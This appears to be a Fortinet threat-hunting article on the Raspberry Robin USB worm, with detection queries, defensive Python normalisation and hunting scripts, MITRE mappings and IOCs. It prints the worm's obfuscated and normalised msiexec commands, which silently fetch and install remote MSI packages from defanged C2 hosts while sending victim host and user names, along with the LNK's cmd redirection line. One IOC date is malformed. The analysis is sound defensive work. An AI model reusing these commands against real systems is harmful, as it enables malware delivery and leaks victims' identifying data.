FortiEDR
FortiEDR automates the protection against advanced threats, pre and post-execution, with real time orchestrated incident response functionality.
ralvarez
Staff
Article Id 226488

Introduction

 

Raspberry Robin is a worm that spreads via USB drives and connects primarily to compromised QNAP NAS devices, which serve as its C2 infrastructure, to download and execute malicious payloads. The worm abuses msiexec.exe to contact its C2 server over HTTP and to download and execute malicious MSI packages. Activity associated with this worm was first observed by Red Canary in September 2021 and publicly reported by them in 2022. There is currently no clear attribution for the creation or distribution of this worm, although its use has been linked to SocGholish fake update campaigns earlier this year.

 

Attack Chain

 

Figure 1. Attack chain associated with Raspberry Robin attack detected by FortiGuard Responder team

 

Initial Access and Execution

 

Raspberry Robin typically arrives on an infected USB drive, where the main component of the worm appears as an anomalous file on the removable device. Numerous file extensions have been associated with these files, and the filenames appear to be randomly generated. The files themselves are not executables; they contain a set of obfuscated cmd commands padded with junk data that is ignored on execution. Alongside this file is an LNK file that executes the content of the main Raspberry Robin file using cmd.exe with the /R parameter: the outer cmd.exe launches a second cmd.exe whose standard input is redirected from the file, so each line of the file is consumed as if it had been typed at a prompt. Lines that are not valid commands simply produce an error and the next line is read, which is why the junk padding is harmless to the worm. An example of such a command line is shown below, where xyz.usb is an example filename used by Raspberry Robin:

 

cmd /r c:\windows\system32\cmd.exe < xyz.usb

 

Successful execution of the malicious file starts an msiexec.exe process that connects to the C2 server and downloads a malicious MSI package carrying the next-stage DLL. It also runs explorer.exe to display the contents of a folder on the compromised USB device.

 

Raspberry Robin File Contents

 

Each of the observed main Raspberry Robin files contains large blocks of random strings, as shown in Figure 2. However, the same pattern can be found in every observed file:

  1. A large block of random strings
  2. An msiexec.exe command that connects to the C2 server (with random characters mixed in and randomized case)
  3. Another large block of random strings
  4. An explorer.exe command that displays a folder (with randomized case)

Figure 2. Example of typical Raspberry Robin main file content

 

 

Although the C2 server and the folder name to display vary from file to file, each Raspberry Robin main file can be identified by the pattern above. The random characters attached to the msiexec.exe and explorer.exe commands also vary, as does the capitalization of the main strings.

 

Each sample contains an msiexec command that connects to the C2 server. In this sample the malware connects to as3[.]biz on port 8080, with %computername% and %username% appended to the URL as additional parameters. These variables are expanded with victim information on execution, so the C2 server learns the host name and user name of each victim from the request itself.

 

When cmd.exe executes the contents of sample01.usb, the random strings are ignored and the obfuscated commands simplify: cmd.exe strips the caret (^) escape characters, and command names and msiexec switches are case-insensitive. For example, the command ^StaR^t mS^i^e^X^Ec /q/ihTtP://aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE% normalizes to start msiexec /q/ihttp://as3[.]biz:8080/vs1cn41zizo/%computername%?%username%. This normalized form can be used to build a command-line based query if process creation telemetry is collected. In the case of the above sample, the server at as3[.]biz serves an installer (MSI file) that msiexec.exe then executes. The C2 server also varies from sample to sample, although all observed samples reference a domain related to a QNAP device.

 

After the msiexec command, another command, start explorer "Removable Disk", is executed to display a folder named "Removable Disk" if one exists. Different variants of the Raspberry Robin main file contain different strings referencing common default names for removable USB drives.

 

Analyzing msiexec command

 

Raspberry Robin uses msiexec.exe to connect to the C2 server and download a malicious MSI package. These commands can be seen in the malicious files found on the infected drives, and the exact command varies from file to file. The random strings added around start msiexec /q /i also make each file distinct from the others, so matching on file hashes or exact strings is unreliable.

 

Below is a list of some of the msiexec command variants found in different malicious files:

Malicious file hash (SHA1) | Obfuscated msiexec command | Normalized version
503620130e7d59853f7ba2119c9b410f0fe346ec | ^StaR^t mS^i^e^X^Ec /q/i"hTtP[:]//aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE%" | start msiexec /q/i"http[:]//as3[.]biz:8080/vs1cn41zizo/%computername%?%username%"
5506fc14acac1dc841abff2b972c972f3f1722ec | sT^ar^T ms^I^e^X^ec /Q /i"htTp[:]//eJ3[.]xyZ:8080/xj92YfGKOB/%COmPUTeRNAmE%?%UseRName%" | start msiexec /q /i"http[:]//ej3[.]xyz:8080/xj92yfgkob/%computername%?%username%"
d92379ee6065391d06cb218dd0d713aa0e7b7942 | st^a^RT m^S^i^E^XeC ^h^L^x^kG^OA^aJ=cG^b^vK^W ^N^c^gBQ^j^YE^q=pS^r^t^t^Y^eG ^sW^aI^BH=^uD^o /Q ^Hp^yxy=^qxP ^bWiW^Uxi=ioA^Z^O -^f^v "http[:]//5jb[.]Me:8080/yyyOd4/bXXDil5hPAU4EHelvZzFJewbWXUu0/xVKlBoCc/%ComputeRNaME%?%USeRnAMe%" | start msiexec /q -fv "http[:]//5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc/%computername%?%username%"
008945cc473304fe2ad7aa4af6b14a120e6703b2 | St%fFFyTpReitUHj%a^RT%ffFytPREiTUhj% %FFFyTpReituhj%M^s^ie%fffyTPreiTUHJ%X^EC ^E^WjZ^L=Z^y^UQ^T^n^F^x ^vHe^t^H=ENa^p^h^n ^e^ry^ZIN=G^g /Q ^rv=^H^u^Bi f^oH^YML^wn=^H^kLtj^u^u ^I^G^v^sxI=ld^uK^kL^aN^U /^I"HttP[:]//W4[.]nz:8080/A/rB/ZQ3N3i36PkkKgOuu6K/%compUTErnAme%=%useRNaMe%" | start msiexec /q /i"http[:]//w4[.]nz:8080/a/rb/zq3n3i36pkkkgouu6k/%computername%=%username%"

Table 1. List of some combinations of msiexec commands found in different malicious samples

 

The msiexec parameter /q (short for /quiet) specifies quiet mode, meaning no user interaction is required (/qn additionally suppresses the UI entirely), and /i specifies a normal installation. The third sample in Table 1 uses /fv instead: /f requests a repair, and the v option re-caches the package from the given source, which also makes msiexec download and process the remote MSI. Switches may be introduced with either / or - and are case-insensitive, so /Q, -I and /i are all equivalent. The junk tokens of the form NAME=VALUE in the third and fourth samples are syntactically valid msiexec public property assignments; msiexec ignores unknown properties, so they pad the command line without affecting the install.
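The normalization described above can be automated. The following Python script is an added example written for readers of this article; it is not Fortinet's code and not part of the worm. It applies cmd.exe's parsing order (%VAR% expansion, then caret removal, then case-insensitive matching), drops the NAME=VALUE padding tokens, and then pulls the C2 URL and the explorer folder out of a constructed file that follows the four-part layout from Figure 2. The obfuscated strings are the Table 1 and Table 2 entries with the URL scheme defanged; the junk lines and SAMPLE_FILE are constructed; and treating any %VAR% token other than %computername% and %username% as empty is an assumption that reproduces the normalized forms published above.

```python
import re

# Variables cmd.exe genuinely expands in these samples. Every other %NAME% token in the
# observed files is junk; treating it as empty is an assumption that reproduces the
# normalized forms in Table 1 (the junk variable is not expected to exist on a victim).
VICTIM_VARS = {"computername", "username"}

# Tokens such as hLxkGOAaJ=cGbvKW are syntactically msiexec PROPERTY=VALUE arguments.
# msiexec accepts unknown public properties without complaint, so they are pure padding.
JUNK_PROPERTY = re.compile(r"^\w+=\w*$")


def normalize_cmd(line):
    """Reduce one obfuscated line to what cmd.exe ends up executing.

    Mirrors cmd.exe's order of operations: %VAR% expansion first, then removal of the
    caret (^) escape character, then case-insensitive handling of command names and
    msiexec switches.
    """
    def expand(match):
        name = match.group(1).lower()
        return f"%{name}%" if name in VICTIM_VARS else ""

    line = re.sub(r"%([^%\s]+)%", expand, line)          # 1. %VAR% expansion
    line = re.sub(r"\^(.)", r"\1", line)                   # 2. ^x -> x (and ^^ -> ^)
    tokens = re.findall(r'"[^"]*"|\S+', line)              # 3. split, keeping quoted args whole
    tokens = [t for t in tokens if not JUNK_PROPERTY.match(t)]  # 4. drop padding properties
    return " ".join(t.lower() for t in tokens)             # 5. case-fold, single spacing


# Obfuscated commands from Table 1 (URL scheme defanged) and the forms they normalize to.
TABLE1_OBFUSCATED = [
    '^StaR^t mS^i^e^X^Ec /q/i"hTtP[:]//aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE%"',
    'sT^ar^T ms^I^e^X^ec /Q /i"htTp[:]//eJ3[.]xyZ:8080/xj92YfGKOB/%COmPUTeRNAmE%?%UseRName%"',
    'st^a^RT m^S^i^E^XeC ^h^L^x^kG^OA^aJ=cG^b^vK^W ^N^c^gBQ^j^YE^q=pS^r^t^t^Y^eG ^sW^aI^BH=^uD^o '
    '/Q ^Hp^yxy=^qxP ^bWiW^Uxi=ioA^Z^O -^f^v '
    '"http[:]//5jb[.]Me:8080/yyyOd4/bXXDil5hPAU4EHelvZzFJewbWXUu0/xVKlBoCc/%ComputeRNaME%?%USeRnAMe%"',
    'St%fFFyTpReitUHj%a^RT%ffFytPREiTUhj% %FFFyTpReituhj%M^s^ie%fffyTPreiTUHJ%X^EC '
    '^E^WjZ^L=Z^y^UQ^T^n^F^x ^vHe^t^H=ENa^p^h^n ^e^ry^ZIN=G^g /Q ^rv=^H^u^Bi f^oH^YML^wn=^H^kLtj^u^u '
    '^I^G^v^sxI=ld^uK^kL^aN^U /^I"HttP[:]//W4[.]nz:8080/A/rB/ZQ3N3i36PkkKgOuu6K/%compUTErnAme%=%useRNaMe%"',
]
TABLE1_NORMALIZED = [
    'start msiexec /q/i"http[:]//as3[.]biz:8080/vs1cn41zizo/%computername%?%username%"',
    'start msiexec /q /i"http[:]//ej3[.]xyz:8080/xj92yfgkob/%computername%?%username%"',
    'start msiexec /q -fv "http[:]//5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc/%computername%?%username%"',
    'start msiexec /q /i"http[:]//w4[.]nz:8080/a/rb/zq3n3i36pkkkgouu6k/%computername%=%username%"',
]


def normalize_table1():
    return [normalize_cmd(c) for c in TABLE1_OBFUSCATED]


# Only two lines of a Raspberry Robin file do anything once normalized.
MSIEXEC_RE = re.compile(r'^start msiexec\b.*?(https?(?:\[:\]|:)//[^"\s]+)')
EXPLORER_RE = re.compile(r'^start explorer\s+"?([^"]+?)"?\s*$')


def extract_indicators(file_text):
    """Walk a suspected Raspberry Robin file and report what it would do under cmd.exe."""
    found = {"c2_url": None, "c2_host": None, "explorer_folder": None}
    for raw in file_text.splitlines():
        norm = normalize_cmd(raw)          # junk lines normalize to junk and match nothing
        m = MSIEXEC_RE.match(norm)
        if m:
            found["c2_url"] = m.group(1)
            found["c2_host"] = re.sub(r"^https?(?:\[:\]|:)//", "", m.group(1)).split("/")[0]
            continue
        m = EXPLORER_RE.match(norm)
        if m:
            found["explorer_folder"] = m.group(1)
    return found


# Constructed stand-in for a main Raspberry Robin file: junk block, msiexec line,
# junk block, explorer line (layout from Figure 2; random strings are made up).
SAMPLE_FILE = "\n".join([
    "qZx7PmL0vK3nR8tWy2HbJ5cFgA1sDfGhJkL",
    "mNbVcXzLkJhGfDsApOiUyTrEwQ",
    TABLE1_OBFUSCATED[0],
    "XcVbNmQwErTyUiOpAsDfGhJk",
    '^s^t^a^r^t ^e^x^P^l^orE^R "Removable Disk"',
])

if __name__ == "__main__":
    for obf, norm in zip(TABLE1_OBFUSCATED, normalize_table1()):
        print(f"{obf[:40]:<40} -> {norm}")
    print(extract_indicators(SAMPLE_FILE))
```

Because the normalizer works on the file content rather than on process telemetry, it can be run over every non-executable file on a suspect USB drive regardless of extension, which is how the anomalous main file is found in practice.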

 

Post Exploitation – HTTP Request

 

FortiEDR captures information related to the execution of msiexec.exe when it connects to the C2 server. The following threat hunting query returns those events:

 

Type: ("Process Creation") AND Source.Process.Name: ("msiexec.exe") AND Source.Process.CommandLine: ("\/q\/i") AND Source.Process.CommandLine: ("http") AND Source.Process.CommandLine: ("\:8080")

 

Another threat hunting query can show us the HTTP request with port 8080 parameter in the URL executed by msiexec.exe:

 

Type: ("HTTP Request") AND URL: (":8080") AND Source.Process.Name: ("msiexec.exe")

 

Figure 3 below shows the details of one of the results of the query above, including the actual C2 server. Note that this query matches every HTTP request made by msiexec.exe whose URL contains port 8080, regardless of the host.

Figure 3. Details on one of the results of the threat hunting query mentioned above

 

START EXPLORER

 

Similar to the msiexec command, the start explorer command is mixed with random strings in the different malicious files. Raspberry Robin uses explorer.exe to display a folder with the specified name; if a folder with that name exists it is opened, otherwise the default folder is displayed. These commands are most likely included so that when the user clicks the LNK file a folder opens, which matches the expected behaviour of a removable drive and stops the user from suspecting that something suspicious has occurred.

 

The table below lists the different start explorer variants found in a number of analyzed samples:

Malicious file hash (SHA1) | Obfuscated explorer command | Normalized version
503620130e7d59853f7ba2119c9b410f0fe346ec | ^s^t^a^r^t ^e^x^P^l^orE^R "Removable Disk" | start explorer "removable disk"
5506fc14acac1dc841abff2b972c972f3f1722ec | S^TA^rT ^E^xPl^o^R^e^r "USB Drive" | start explorer "usb drive"
d92379ee6065391d06cb218dd0d713aa0e7b7942 | S^t^aRt ex^PL^o^rE^R "ETIENNE II" | start explorer "etienne ii"
008945cc473304fe2ad7aa4af6b14a120e6703b2 | St%ffFYtPreituHj%a^Rt%FffytPReITUhj% %FfFytPreitUHJ%e%FfFYtPReiTUhJ%X %fffytPrEituHj%P^lO%FFfYTpReITUhJ%R %ffFYtpReITuHj%e^R %fFfYtPrEiTuHj% v^IN^o^d | start explorer vinod

Table 2. List of some combinations of explorer commands found in different malicious samples

 

Recent Attacks

 

Recently, we have seen new Raspberry Robin samples on endpoints protected by FortiEDR. In one of the analyzed incidents (Figure 4) a USB drive was identified containing an LNK file and an ICO file. The user clicked the LNK file, which launched a cmd process that executed the contents of the Fn.ICO file containing the Raspberry Robin commands. As described in the previous section, the Fn.ICO file contains a small number of commands used to download and execute a malicious MSI package from a C2 server; in this case the contacted domain was u0[.]rS. The complete msiexec command is shown below (defanged). Note that it uses /qN and -I rather than the /q/i form seen in the earlier samples, which matters for command-line based detections:

 

msiexec.exe /qN -I "hTtP[:]//u0[.]rS[:]8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/<computername>?<username>"

 

Figure 4 shows the execution of the LNK file leading to the connection to its C2 server. When the user clicks the LNK file, FortiEDR records explorer.exe executing cmd.exe (the expected process chain for LNK execution). That cmd.exe starts a second cmd.exe, which runs a series of msiexec.exe processes that download an installer from the C2 server u0[.]rS. In this event the malicious msiexec.exe process creates a suspended instance of dllhost.exe (a standard Windows binary), which is subsequently hollowed with a malicious payload and then resumed.

 

Process hollowing is a technique in which a process is started in the suspended state and its in-memory code is overwritten with different (often malicious) code before the process is resumed. It can be used to hide malicious code inside a trusted, allow-listed process, and it executes a new payload without creating a new file, since the code is written directly into memory rather than touching disk. Once the hollowed dllhost.exe process was resumed, the injected code connected to a second stage C2 address, 199[.]249[.]230[.]115.

Figure 4. FortiEDR blocks Raspberry Robin's connection attempt to its C2 server

 

In the attack analyzed above the affected customer did not have process hollowing protections enabled, but FortiEDR blocked the C2 connection attempts, preventing the hollowed implant from communicating with its C2. FortiEDR has out-of-the-box rules to prevent this process hollowing behaviour and can be configured to remove hollowed implants using automated playbooks.

 

Using the Fortinet Central Threat System (CTS) shown in Figure 5, we can see that the IP address 199[.]249[.]230[.]115 is tagged as a Tor exit node. Tor (The Onion Router) is a free and open-source network for anonymous communication and is one way for threat actors to hide their C2: the implant connects to a public Tor relay and the real C2 endpoint sits behind the Tor network, so the relay address observed on the wire is public Tor infrastructure rather than an attacker-owned server, and it can change between connections. Unless there is a business need, it is recommended that customers block all communication to and from Tor nodes in corporate environments where possible. CISA guidance on defending against Tor access to and from your network is available in the following advisory: https://www.cisa.gov/uscert/sites/default/files/publications/AA20-183A_Defending_Against_Malicious_C...

Figure 5. Fortinet Central Threat System (CTS) identifies 199[.]249[.]230[.]115 as a Tor exit node

 

The behaviour analyzed above is just one of many Raspberry Robin infections detected and blocked by FortiEDR. The FortiGuard MDR team has also identified variants that perform process hollowing against dllhost.exe, rundll32.exe and regsvr32.exe. Defenders relying on telemetry based monitoring should look for anomalous network connections from these three executables where the parent process is msiexec.exe if a tool capable of detecting process hollowing is not available. A hollowed process usually carries a benign-looking command line of its own, so the parent process and the parent's command line are the useful signals.

 

Conclusion

 

The continued prevalence of Raspberry Robin highlights the need for organisations to monitor the use of USB devices within their networks, and to treat USB-borne worms as a realistic initial access vector even though they are less common than the phishing or direct access methods seen in more prevalent threats. Where this type of worm is used to deliver a malicious payload into a FortiEDR protected environment, FortiEDR is positioned to provide on-going protection against the post-exploitation activity.

 

FortiEDR Threat Hunting telemetry can also be used to build additional detections that attribute observed activity to Raspberry Robin more quickly and so expedite analyst triage. Threat Hunting queries designed to assist with detecting Raspberry Robin activity are shown below, followed by the MITRE ATT&CK techniques involved in this activity and the IOCs related to the observed activity.

 

Threat Hunting

 

This query returns all process creation events for msiexec.exe where the command line contains /q/i, indicating that msiexec is quietly installing an MSI package, together with http and :8080, which indicate that the package is being fetched from a remote server. The substring /q/i is matched literally: the samples in Table 1 that use /Q /i (with a space) or /q -fv, and the /qN -I form from the recent incident above, are not matched by it, so pair this query with the broader HTTP request query below. There may be false positives if software in the monitored environment uses msiexec to install remote MSI packages as part of updates, but none were observed during testing:

Type: ("Process Creation") AND Source.Process.Name: ("msiexec.exe") AND Source.Process.CommandLine: ("\/q\/i") AND Source.Process.CommandLine: ("http") AND Source.Process.CommandLine: ("\:8080")

 

This query returns all HTTP request events for msiexec.exe where the URL contains port 8080. It is a more generic version of the query above and does not depend on the exact form of the command line. As with the previous query, there may be false positives if software in the monitored environment uses msiexec to install remote MSI packages as part of updates, but none were observed during testing:

Type: ("HTTP Request") AND URL: (":8080") AND Source.Process.Name: ("msiexec.exe")

 

This query returns all process creation events for dllhost.exe, rundll32.exe and regsvr32.exe processes spawned by msiexec.exe processes whose command line arguments are consistent with the behaviour of the Raspberry Robin samples observed by the FortiGuard MDR team. The command-line condition is what separates this from a legitimate installer that registers a DLL through regsvr32.exe or rundll32.exe. As with the previous queries, there may be false positives if software in the monitored environment uses msiexec to install remote MSI packages as part of updates, but none were observed during testing:

Type:"Process Creation" AND Source.Process.Name:"msiexec.exe" AND Source.Process.CommandLine: ("\/q\/i" AND "http" AND "\:8080") AND Target.Process.Name:("dllhost.exe" OR "rundll32.exe" OR "regsvr32.exe")

 

This query detects thread created events where the source process is msiexec.exe and the target process is one of the processes targeted with process hollowing in the Raspberry Robin activity observed by the FortiGuard MDR team. There are no expected false positives associated with this activity: a legitimate installer may spawn regsvr32.exe or rundll32.exe as a child, but it has no reason to create a thread inside that child:

Type:"Thread Created" AND Source.Process.Name:"msiexec.exe" AND Target.Process.Name:("dllhost.exe" OR "rundll32.exe" OR "regsvr32.exe")
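The four queries above can be reproduced outside FortiEDR over exported telemetry. The Python below is an added example, not FortiEDR code and not a supported query syntax. It models events as flat dictionaries whose keys mirror the field names used in the queries (Source is the acting or parent process and Target the child, which is an assumption about the schema), and it generalizes the literal /q/i substring to any quiet install or repair (/q, /qn, /i, -I, /f, -fv) of a URL-sourced package, so it also covers the /qN -I form from the recent incident and the -fv sample in Table 1. All events, command lines and user names are constructed; the host names are the article's, kept defanged.

```python
import re

# Processes Raspberry Robin was observed hollowing from msiexec.exe (from the article).
HOLLOW_TARGETS = {"dllhost.exe", "rundll32.exe", "regsvr32.exe"}


def msiexec_switches(cmdline):
    """Return the set of msiexec switch letters ('q', 'i', 'f', ...) in a command line.

    Quoted arguments are blanked first so that a URL path or file path cannot
    contribute a fake switch, and a quiet switch glued to the next switch
    ("/q/i", "-q-I") is split so that both are seen.
    """
    s = re.sub(r'"[^"]*"', ' "" ', cmdline)
    s = re.sub(r"([/-]q[a-z!+]*)(?=[/-])", r"\1 ", s, flags=re.I)
    return {t[1].lower() for t in s.split()
            if t[0] in "/-" and len(t) > 1 and t[1].isalpha()}


def is_remote_quiet_install(cmdline):
    """Quiet (/q, /qn, -q) install (/i, -I) or repair (/f, -fv) of a package given as a URL."""
    sw = msiexec_switches(cmdline)
    return ("q" in sw and bool(sw & {"i", "f"})
            and re.search(r"https?://", cmdline, re.I) is not None)


def hunt(events):
    """Run the four detections over a list of events; return (event index, rule name) hits."""
    hits = []
    for i, ev in enumerate(events):
        kind = ev.get("Type")
        src = ev.get("Source.Process.Name", "").lower()
        tgt = ev.get("Target.Process.Name", "").lower()
        src_cmd = ev.get("Source.Process.CommandLine", "")
        tgt_cmd = ev.get("Target.Process.CommandLine", "")
        if kind == "Process Creation":
            # Rule 1: an msiexec.exe on either side of the event carries a quiet
            # remote-install command line (covers cmd.exe -> msiexec.exe and msiexec.exe -> child).
            if any(n == "msiexec.exe" and is_remote_quiet_install(c)
                   for n, c in ((src, src_cmd), (tgt, tgt_cmd))):
                hits.append((i, "msiexec_remote_quiet_install"))
            # Rule 3: that msiexec.exe spawns one of the hollowing targets. The child's own
            # command line is benign, so the parent's command line is the condition.
            if src == "msiexec.exe" and tgt in HOLLOW_TARGETS and is_remote_quiet_install(src_cmd):
                hits.append((i, "msiexec_spawns_hollow_target"))
        elif kind == "HTTP Request":
            # Rule 2: msiexec.exe talking to port 8080; no dependency on the command line.
            if src == "msiexec.exe" and re.search(r":8080(?:/|$)", ev.get("URL", "")):
                hits.append((i, "msiexec_http_8080"))
        elif kind == "Thread Created":
            # Rule 4: msiexec.exe creating a thread inside a hollowing target.
            if src == "msiexec.exe" and tgt in HOLLOW_TARGETS:
                hits.append((i, "msiexec_thread_in_hollow_target"))
    return hits


# Constructed telemetry. Host names are the article's (defanged); WS01/alice are made up.
RR_MSIEXEC = 'msiexec.exe /qN -I "http://u0[.]rs:8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/WS01?alice"'
RR_MSIEXEC_FV = 'msiexec /q -fv "http://5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc/WS01?alice"'
LOCAL_MSIEXEC = r'msiexec.exe /i "C:\Temp\vendor-agent.msi" /qn'   # benign local install

EVENTS = [
    {"Type": "Process Creation", "Source.Process.Name": "explorer.exe",                 # 0 LNK click
     "Target.Process.Name": "cmd.exe",
     "Target.Process.CommandLine": r"cmd /r c:\windows\system32\cmd.exe < Fn.ICO"},
    {"Type": "Process Creation", "Source.Process.Name": "cmd.exe",                      # 1 worm msiexec
     "Target.Process.Name": "msiexec.exe", "Target.Process.CommandLine": RR_MSIEXEC},
    {"Type": "HTTP Request", "Source.Process.Name": "msiexec.exe",                      # 2 C2 download
     "URL": "http://u0[.]rs:8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/WS01?alice"},
    {"Type": "Process Creation", "Source.Process.Name": "msiexec.exe",                  # 3 hollow target spawned
     "Source.Process.CommandLine": RR_MSIEXEC, "Target.Process.Name": "dllhost.exe",
     "Target.Process.CommandLine": "dllhost.exe"},
    {"Type": "Thread Created", "Source.Process.Name": "msiexec.exe",                    # 4 hollowing
     "Target.Process.Name": "dllhost.exe"},
    {"Type": "Process Creation", "Source.Process.Name": "cmd.exe",                      # 5 benign install
     "Target.Process.Name": "msiexec.exe", "Target.Process.CommandLine": LOCAL_MSIEXEC},
    {"Type": "Process Creation", "Source.Process.Name": "msiexec.exe",                  # 6 benign DLL registration
     "Source.Process.CommandLine": LOCAL_MSIEXEC, "Target.Process.Name": "regsvr32.exe",
     "Target.Process.CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\agent.dll"'},
    {"Type": "Process Creation", "Source.Process.Name": "cmd.exe",                      # 7 /q -fv variant
     "Target.Process.Name": "msiexec.exe", "Target.Process.CommandLine": RR_MSIEXEC_FV},
]

if __name__ == "__main__":
    for idx, rule in hunt(EVENTS):
        print(f"event {idx}: {rule}")
```

Events 5 and 6 are the false-positive controls: a local quiet install, and that installer registering a DLL via regsvr32.exe, trigger nothing because neither msiexec command line names a URL.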

 

MITRE ATT&CK

 

TA0001 – Initial Access

Technique ID | Technique Description | Observed Activity
T1091 | Replication Through Removable Media | Raspberry Robin activity analysed in this article is executed from a compromised USB drive. It is not yet known how the USB drives are being infected.

TA0008 – Lateral Movement

Technique ID | Technique Description | Observed Activity
T1091 | Replication Through Removable Media | The same removable-media replication also serves as lateral movement (ATT&CK lists T1091 under both tactics): an infected USB drive carried between hosts spreads the worm from one machine to the next.

TA0002 – Execution

Technique ID | Technique Description | Observed Activity
T1204.002 | User Execution: Malicious File | Raspberry Robin relies on the user clicking a malicious LNK file on the compromised USB drive.
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | The LNK file runs cmd.exe, which executes the set of commands stored in a file on the USB drive. Because the LNK file is launched from the shell, the parent process of cmd.exe is explorer.exe.

TA0005 – Defense Evasion

Technique ID | Technique Description | Observed Activity
T1218.007 | System Binary Proxy Execution: Msiexec | Raspberry Robin uses msiexec.exe to download and run a malicious installer. Msiexec.exe is called from a cmd.exe process as part of the LNK execution and takes a URL as part of its command line arguments.
T1055.012 | Process Injection: Process Hollowing | Raspberry Robin uses process hollowing to place its final payload inside a separate process. Variants observed by the FortiGuard MDR team targeted dllhost.exe, rundll32.exe and regsvr32.exe; the hollowed processes were spawned by the msiexec.exe process.
T1027 | Obfuscated Files or Information | Raspberry Robin executes commands stored in a file on the USB drive. The file contains obfuscated msiexec.exe and explorer commands padded with randomized strings, caret escapes and randomized case.

TA0011 – Command and Control

Technique ID | Technique Description | Observed Activity
T1071.001 | Application Layer Protocol: Web Protocols | Raspberry Robin downloads a malicious installer from its C2 server via a web request from the msiexec.exe process (legitimate msiexec functionality). Once the installer has executed and created a hollowed process (dllhost.exe, rundll32.exe or regsvr32.exe) with an injected payload, that payload also attempts to reach its C2 via web requests into the Tor network.

 

 

IOCs

 

Indicator Description | Indicator | Indicator Type | Associated Tactic | Notes | First Observed
Raspberry Robin sample | 503620130e7d59853f7ba2119c9b410f0fe346ec | SHA1 hash | Installation | Raspberry Robin sample that tries to connect to as3[.]biz | 2022-05-09
Raspberry Robin sample | 5506fc14acac1dc841abff2b972c972f3f1722ec | SHA1 hash | Installation | Raspberry Robin sample that tries to connect to ej3[.]xyz | 2022-05-30
Raspberry Robin sample | d92379ee6065391d06cb218dd0d713aa0e7b7942 | SHA1 hash | Installation | Raspberry Robin sample that tries to connect to 5jb[.]me | 2022-08-01
Raspberry Robin sample | 008945cc473304fe2ad7aa4af6b14a120e6703b2 | SHA1 hash | Installation | Raspberry Robin sample that tries to connect to w4[.]nz | 2022-08-06
MSI file | 3b552f77179299d3a3df06b3f687eb91013d46bb | SHA1 hash | Installation | MSI sample downloaded from a Raspberry Robin C2 server such as w4[.]nz | 2022-07-03
DLL file | bfcfa72ba5095fba108314c1c4deb5faed82ef4d | SHA1 hash | Installation | DLL packaged within the MSI file downloaded by Raspberry Robin | 2022-01-20
Malicious URL | http[:]//as3[.]biz:8080/vs1cn41zizo | URL | Installation | Raspberry Robin C2 URL used to download a malicious installer | 2022-05-09
Malicious URL | http[:]//ej3[.]xyz:8080/xj92yfgkob | URL | Installation | Raspberry Robin C2 URL used to download a malicious installer | 2022-05-30
Malicious URL | http[:]//5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc | URL | Installation | Raspberry Robin C2 URL used to download a malicious installer | 2022-08-01
Malicious URL | http[:]//w4[.]nz:8080/a/rb/zq3n3i36pkkkgouu6k | URL | Installation | Raspberry Robin C2 URL used to download a malicious installer | 2022-08-06
Malicious URL | http[:]//u0[.]rs:8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/ | URL | Installation | Raspberry Robin C2 URL used to download a malicious installer | 2022-014
IP Address | 185[.]146[.]232[.]191 | IP Address | C2 | Tor relay (tagged as exit node) contacted by the hollowed implant to reach its C2 over Tor | 2022-09-14
IP Address | 212[.]186[.]71[.]38 | IP Address | C2 | Tor relay (tagged as exit node) contacted by the hollowed implant to reach its C2 over Tor | 2022-09-14
IP Address | 45[.]128[.]133[.]206 | IP Address | C2 | Tor relay (tagged as exit node) contacted by the hollowed implant to reach its C2 over Tor | 2022-09-14
IP Address | 188[.]165[.]26[.]89 | IP Address | C2 | Tor relay (tagged as exit node) contacted by the hollowed implant to reach its C2 over Tor | 2022-09-14
IP Address | 185[.]165[.]168[.]77 | IP Address | C2 | Tor relay (tagged as exit node) contacted by the hollowed implant to reach its C2 over Tor | 2022-09-14
IP Address | 198[.]50[.]238[.]128 | IP Address | C2 | Tor relay (tagged as exit node) contacted by the hollowed implant to reach its C2 over Tor | 2022-09-14
IP Address | 198[.]98[.]59[.]243 | IP Address | C2 | Tor relay (tagged as exit node) contacted by the hollowed implant to reach its C2 over Tor | 2022-09-14
IP Address | 74[.]208[.]203[.]175 | IP Address | C2 | Tor relay (tagged as exit node) contacted by the hollowed implant to reach its C2 over Tor | 2022-09-14
IP Address | 199[.]249[.]230[.]115 | IP Address | C2 | Tor relay (tagged as exit node) contacted by the hollowed implant to reach its C2 over Tor | 2022-09-14
